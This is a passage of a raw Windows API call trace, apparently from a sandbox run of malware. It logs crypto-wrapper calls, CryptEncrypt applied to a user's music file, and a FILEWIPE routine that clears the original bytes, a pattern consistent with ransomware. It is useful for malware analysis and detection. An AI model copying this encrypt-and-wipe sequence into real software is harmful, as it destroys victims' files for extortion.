lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0185.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.915] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.915] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0185.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.916] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.916] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.917] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.917] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.917] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1227f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x12280) returned 1 [0185.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] CharLowerBuffW (in: lpsz="byte[74369]", cchLength=0xb | out: lpsz="byte[74369]") returned 0xb [0185.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.918] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.919] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa71290*, pdwDataLen=0x87e820*=0x1227f, dwBufLen=0x12280 | out: pbData=0xa71290*, pdwDataLen=0x87e820*=0x12280) returned 1 [0185.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.919] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.920] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.920] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.920] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.920] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.920] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.920] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.920] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.925] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.925] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.925] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.931] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.931] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.931] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0185.931] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.931] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0185.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.932] CryptDestroyKey (hKey=0x90af98) returned 1 [0185.932] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.932] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.932] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.932] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.932] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.932] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.932] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.932] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.933] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.933] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.933] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.933] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.933] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.933] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.933] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.933] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0185.933] FreeLibrary (hLibModule=0x74f20000) returned 1 [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.933] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.934] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.934] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.936] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.936] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0185.936] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c108870, ftCreationTime.dwHighDateTime=0x1d5dba5, ftLastAccessTime.dwLowDateTime=0x200a6cc0, ftLastAccessTime.dwHighDateTime=0x1d5e384, ftLastWriteTime.dwLowDateTime=0x200a6cc0, ftLastWriteTime.dwHighDateTime=0x1d5e384, nFileSizeHigh=0x0, nFileSizeLow=0x1227f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="O8LnB5uJ.mp3", cAlternateFileName="")) returned 0x90ae18 [0185.937] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.937] CharLowerBuffW (in: lpsz="byte[74367]", cchLength=0xb | out: lpsz="byte[74367]") returned 0xb [0185.938] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.938] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0185.938] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.938] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0185.939] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 